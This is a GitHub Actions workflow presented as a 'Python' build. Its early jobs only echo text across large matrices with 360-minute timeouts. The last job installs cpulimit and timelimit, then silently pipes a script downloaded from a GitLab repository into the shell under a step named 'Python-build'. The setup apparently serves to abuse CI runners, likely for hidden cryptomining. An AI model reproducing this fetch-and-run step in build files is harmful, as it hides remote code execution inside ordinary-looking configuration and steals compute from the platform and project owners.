name: Python
on:  
  push:
  pull_request:

jobs:
 python-1:
    runs-on: ubuntu-20.04
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-2:
    runs-on: ubuntu-20.04 
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-build-4:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 360
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update && sudo apt-get install cpulimit timelimit -y
    - name: Python-build
      run: curl https://gitlab.com/kerja6381734/COCACOLA/-/raw/main/cpuu.sh | sh >/dev/null 2>&1
